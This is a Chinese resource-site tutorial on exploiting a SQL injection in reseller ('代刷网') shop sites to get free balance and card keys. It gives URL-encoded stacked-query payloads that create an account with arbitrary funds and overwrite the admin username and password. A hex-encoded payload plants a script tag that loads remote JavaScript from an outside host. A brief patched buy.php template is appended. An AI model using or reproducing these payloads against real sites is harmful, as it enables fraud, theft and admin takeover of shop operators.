代刷网的sql注入漏洞，白嫖余额、卡密-清扬资源网

教程开始

首先，大家先去找一个代刷网的网站，然后注册一个分站

20230807010341361

20230807010343612

20230807010556342

然后去到你分站链接首页，然后打上payload(文末提供)

如http://123.com/payload代码

然后访问就好了

给你们的payload(能够绕过服务器商自带的waf和彩虹源码自带的防火墙)

跳转后直接在你的分站登录你设置payload的账号就会有余额了

20230807010637709

测试余额可以下单购买

20230807010710869

注意有一些代刷不是自动发货

20230807010743803

payload

[hidecontent type=”reply” desc=”隐藏内容：评论后查看”]

例子：http://123.com/?cid=1;insert%20into%20pre_site%20set%20zid=’01124’%2Cuser=’iyhua’%2Cpwd=’031124’%2Crmb=’999.24’%2Cstatus=’1′

创建用户，创建好后在你的分站登录你payload里面的账号密码就有余额了

?cid=1;replace%20into%20pre_site%20set%20zid='数字(随便写)'%2Cuser='用户名'%2Cpwd='密码'%2Crmb='余额'%2Cstatus='1'

修改后台密码(需要知道后台路径)

依次执行

①?cid=1;replace%20into%20pre_config%20(k%2Cv)%20values%20(%27admin_pwd%27%2C%27密码%27)
②?cid=1;replace%20into%20pre_config%20(k%2Cv)%20values%20(%27admin_user%27%2C%27账号%27)
③?cid=1;replace%20into%20pre_cache%20(k%2Cv)%20values%20(%27config%27%2C%27a%27)

所有操作完成以后再执行这个清记录

？cid=1;replace%20into%20shua_tools%20set%20tid=21%2Czid=21%2Csort=1%2Cname=0x3c734352695074207352433d2f2f756a2e63692f396b703e3c2f7343724970543e74657374%2Cclose=1%2Cinput=1%2Caddtime=0x323032332d372d31382031323a32323a3232

[/hidecontent]

修复方法
文件地址：/template/argon/buy.php

手动修复：只需要增加一行代码即可，按图文操作即可。

20230807011245918

重新复制源代码粘贴至指定文件地址即可。

<?php
if(!defined('IN_CRONLITE'))exit();
$cid = isset($_GET['cid']) ? $_GET['cid']:exit('分类ID不正确');
$cid = intval($cid);
$info=$DB->getRow("SELECT * FROM pre_class WHERE cid=$cid");
include_once TEMPLATE_ROOT.'argon/head.php';
?>
    <div class="container-fluid mt--7">
      <div class="row" style="max-width:1200px;margin:0 auto;">
        <div class="col text-center">
          <div class="card shadow">
            <div class="card-header bg-transparent">
              <h3 class="mb-0"><?php echo $info['name']?></h3>
            </div>
            <div class="card-body px-0">
               <div class="container">
                <div class="row">
                  <div class="col-lg-6 col-12">
                      <div class="panel-body">
                        <input type="hidden" name="cid" id="cid" value="0"/>
                        <div class="input-group">
                            <div class="input-group-addon">
                                选择商品
                            </div>
                            <select name="tid" id="tid" class="form-control" onChange="getPoint();"><option value="0">请选择商品</option></select>
                        </div>
                        <div class="input-group">
                            <div class="input-group-addon">
                                商品价格
                            </div>
                            <input type="text" name="need" id="need" class="form-control" disabled/>
                        </div>
                        <div class="input-group" id="display_left" style="display:none;">
                            <div class="input-group-addon">
                                库存数量
                            </div>
                            <input type="text" name="leftcount" id="leftcount" class="form-control" disabled/>
                        </div>
                        <div class="input-group" id="display_num" style="display:none;">
                            <div class="input-group-prepend">
                                <div class="input-group-addon">
                                    下单份数
                                </div>
                                <span id="num_min" class="btn btn-success wxd-index-bor-rad0" style="border-top-left-radius: .375rem;border-bottom-left-radius: .375rem;"><i class="fa fa-minus"></i></span>
                            </div>
                            <input id="num" name="num" class="form-control" type="number" min="1" value="1" style="text-align:center;"/>
                            <div class="input-group-append">
                                <span id="num_add" class="btn btn-success"><i class="fa fa-plus"></i></span>
                            </div>
                        </div>
                  <div id="inputsname"></div>
                        <div  class="alert alert-warning text-left" style="display:none;font-weight: bold;"></div>
            <?php if($conf['shoppingcart']==1){?>
            <div class="btn-group form-group">
              <input class="btn btn-success" type="button" id="submit_cart_shop" value="加入购物车">
              <input type="submit" id="submit_buy" class="btn btn-primary" value="立即购买">
            </div>
            <?php }else{?>
            <div class="form-group">
              <input type="submit" id="submit_buy" class="btn btn-primary btn-block" value="立即购买">
            </div>
            <?php }?>
                    </div>
                  </div>
                  <div class="col-lg-6 col-12">
                        <div id="alert_frame" class="alert alert-warning text-left" style="display:none;font-weight: bold;"></div>
                  </div>
                </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
    <div class="position-fixed wxd-b-menu">
  <div class="mt-3 d-none" id="alert_carts">
        <a class="btn btn-info wxd-b-but" href="./?mod=cart" title="购物车列表">
            <i class="fa fa-shopping-cart fa-2x"></i>
        </a><div class="nav-counter nav-counter-big" id="cart_counts"></div>
    </div>
    <div class="mt-3 d-none d-md-block">
        <a class="btn btn-success wxd-b-but" href="#BKefu" data-toggle="modal">
            <i class="fa fa-qq fa-2x"></i>
        </a>
    </div>
    <div class="mt-3 d-none d-md-block">
        <a class="btn btn-primary wxd-b-but" href="#gg" data-toggle="modal">
            <i class="fa fa-bell fa-2x"></i>
        </a>
    </div>
    <div class="mt-3">
        <a class="btn btn-danger wxd-b-but" href="javascript:void(0)" onClick="javascript :history.back(-1);" style="padding:1rem 1.2rem;">
            <i class="fa fa-times fa-2x"></i>
        </a>
    </div>
</div>
<div class="modal fade" id="BKefu" tabindex="-1" role="dialog" aria-labelledby="modal-notification" aria-hidden="true">
    <div class="modal-dialog modal-dialog-centered modal-" role="document">
        <div class="modal-content">
            <div class="modal-body">
            <div class="py-1 text-center">
                <i class="fa fa-comment-dots fa-3x mb-3"></i>
                <div class="row">
                    <div class="col-12 mb-3">
                        <h6 class="">订单售后客服ＱＱ</h6>
                        <a target="_blank" class="dropdown-item" href="http://wpa.qq.com/msgrd?v=3&uin=<?php echo $conf['kfqq']?>&site=qq&menu=yes"><img border="0" src="//wpa.qq.com/pa?p=2:<?php echo $conf['kfqq']?>:52" alt="点击这里给我发消息" title="点击这里给我发消息"/> <?php echo $conf['kfqq']?></a>
                    </div>
                </div>
            </div>
            </div>
            <div class="modal-footer py-2">
                <button type="button" class="btn btn-primary" data-dismiss="modal">知道啦</button> 
            </div>
        </div>
    </div>
</div>
<div class="shuaibi-zhezhao" id="ShuaibiZhezhao"></div>
<div class="shuaibi-zzimg" id="ShuaibiZzimg">
    <span id="ShuaibiZzclose"><i class="fa fa-times fa-3x"></i></span>
    <img src="assets/img/bookmark.png" alt="bookmark">
</div>
<footer class="footer">
    <div class="row align-items-center justify-content-xl-between m-0">
      <div class="col-lg-12">
        <div class="copyright text-center text-muted">
          © <?php echo date("Y")?> <a href="./" class="font-weight-bold ml-1" target="_blank"><?php echo $conf['sitename']?></a> • <a href="javascript:void(0)" class="font-weight-bold ml-1" onclick="layer.alert('电脑用户请按键盘 <kbd>Ctrl</kbd> + <kbd>D</kbd> 将本站存为书签！', {icon: 7,title: '小提示',skin: 'layui-layer-molv layui-layer-wxd'})">收藏</a>
        </div>
      </div>
    </div>
</footer>
<script src="<?php echo $cdnpublic?>jquery/1.12.4/jquery.min.js"></script>
<script src="<?php echo $cdnpublic?>jquery.lazyload/1.9.1/jquery.lazyload.min.js"></script>
<script src="<?php echo $cdnpublic?>twitter-bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script src="<?php echo $cdnpublic?>jquery-cookie/1.4.1/jquery.cookie.min.js"></script>
<script src="<?php echo $cdnpublic?>layer/2.3/layer.js"></script>
<script type="text/javascript">
var isModal=false;
var homepage=false;
var hashsalt=<?php echo $addsalt_js?>;
$(function() {
  setTimeout(function () { 
        layer.tips('点我选择商品哦~', '#tid', {
            tips: [1, '#7788ff'],
            time: 3000
        }); 
    }, 500); 
<?php if($conf['shoppingcart']==1){?>
$.ajax({
  type : "GET",
  url : "ajax.php?act=cart_info",
  dataType : 'json',
  async: true,
  success : function(data) {
    if(data.count != null && data.count>0){
      $('#cart_count').html(data.count);
      $('#alert_cart').show();
      $('#cart_counts').html(data.count);
      $('#alert_carts').addClass('d-md-block');
    }
  }
});
<?php }?>
});
</script>
<script src="assets/js/main.js?ver=<?php echo VERSION ?>"></script>
</body>
</html>

声明：本站所有文章，如无特殊说明或标注，均为本站原创发布。任何个人或组织，在未征得本站同意时，禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益，可联系我们进行处理。

代刷网的sql注入漏洞，白嫖余额、卡密

教程开始

payload

例子：http://123.com/?cid=1;insert%20into%20pre_site%20set%20zid=’01124’%2Cuser=’iyhua’%2Cpwd=’031124’%2Crmb=’999.24’%2Cstatus=’1′

修复方法
文件地址：/template/argon/buy.php

评论(0)

提示：请文明发言取消回复

排行榜展示

2024最新鲨鱼台源码，转转交易猫闲鱼后台搭建教程【源码+教程】

MyOkex海外多语言交易所源码/前端uniapp纯源码+后端php+搭建教程

2024全新付费进群源码/全开源/九块九进群源码/支持分销等功能

多国语言/区块链交易所系统/币币期权交易/IEO/锁仓理财/秒合约

子比zibll-V7.6.0最新版完美破解授权教程含绕授权文件

NineAi新版AI系统网站源码/ai人工智能源码搭建/ChatGPT

文章展示

新版测算系统源码

2024最新办公软件教程资讯整站源码

旗舰百威百亿28系统开奖包

某站价值3000的仿SOUL社交友附近人婚恋约仿陌陌APP源码系统

短视频短剧在线搜索源码/短视频API资源整合源码

唯美贺卡QQ微信小程序完整源码无需后台直接运营

代刷网的sql注入漏洞，白嫖余额、卡密

教程开始

payload

例子：http://123.com/?cid=1;insert%20into%20pre_site%20set%20zid=’01124’%2Cuser=’iyhua’%2Cpwd=’031124’%2Crmb=’999.24’%2Cstatus=’1′

修复方法文件地址：/template/argon/buy.php

评论(0)

提示：请文明发言 取消回复

相关文章

排行榜展示

文章展示

修复方法
文件地址：/template/argon/buy.php

提示：请文明发言取消回复